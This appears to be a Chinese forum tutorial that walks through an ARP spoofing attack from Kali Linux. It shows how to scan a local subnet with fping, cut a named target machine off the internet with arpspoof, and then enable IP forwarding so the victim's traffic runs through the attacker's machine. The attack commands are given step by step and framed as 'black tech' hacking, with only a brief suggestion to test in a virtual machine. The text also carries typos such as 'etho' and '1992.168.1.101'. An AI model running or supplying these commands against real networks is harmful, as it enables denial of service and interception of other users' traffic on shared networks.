arp命令的使用:Arpspoof断网: -i 网卡 -t 目标ip 网关
1.使用ifconfig命令查看kal系统的IP地址情况
686
2.使用IPconfig命令查看Windows操作系统的网卡情况,这个也就是本次需要进行局域网断网攻击的IP地址
687
IPv4 地址 . . . . . . . . . . . . : 192.168.1.100
子网掩码 . . . . . . . . . . . . : 255.255.255.240
688
默认网关. . . . . . . . . . . . . : 192.168.1.1
3.如果不知道对方IP的话怎么办?可以使用如下命令进行扫描IP:
Fping -asg 192.168.1.1/24
注意第三位的值是和你所在网络环境下的IP相应值是一样的哈!
689
我们扫描到以下几个IP地址:
192.168.1.1
192.168.1.100 (目标计算机)
1992.168.1.101
4.我们先来测试一下当前目标计算机能不能上网
690
打开百度首页正常,也可以进行正常搜索,一切网络环境正常。
5.开始实现断网攻击,输入目标命令,具体如下,
691
实现:arpspoof -i etho -t 192.168.1.100 192.168.1.1
6.我们再来看下目标计算机能不能正常上网,目标计算机已经不能正常上网了,断网攻击成功!
692
693
【Arp欺骗和断网的内部黑科技原理】:
原理:目标的IP会经过我的网卡, 然后从网卡出去
【ARP欺骗成功要点】
先看下这个设置对不对,如果输入这个命令之后不是1的话那就不会成功的!
root@kali:~# cat /proc/sys/net/ipv4/ip_forward
1
1.需要先设置一下KaliLinux的内置参数(关键点)
让目标机器的流量从我的我网关出去:
echo 1 >/proc/sys/net/ipv4/ip_forward【此处不会有回显】
此时:Arp成功欺骗,不会出现断网现象!
2. 场景回顾:
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1
3.这种黑科技(黑客攻击)攻击方式只适用于局域网,可以自己搭建一个虚拟机环境进行测试,公网IP是不可以的哈!
同一个网段是指地址的网络段相同的地址
如:同个网段的话它的IP就是192.168.0.1到192.168.0.255之间.
前提是同一网段的地址子网掩码一定相同.
如:相同掩码255.255.255.0
具体的黑科技渗透(黑客技术)视频教程可以参见文章:
WEB渗透实战教程【包括无线网/KaliLinux系列教程】
http://www.52tech.tech/forum.php?mod=viewthread&tid=41&fromuid=1
(出处: 我爱科技论坛)
评论
填写昵称与邮箱即可评论,无需登录。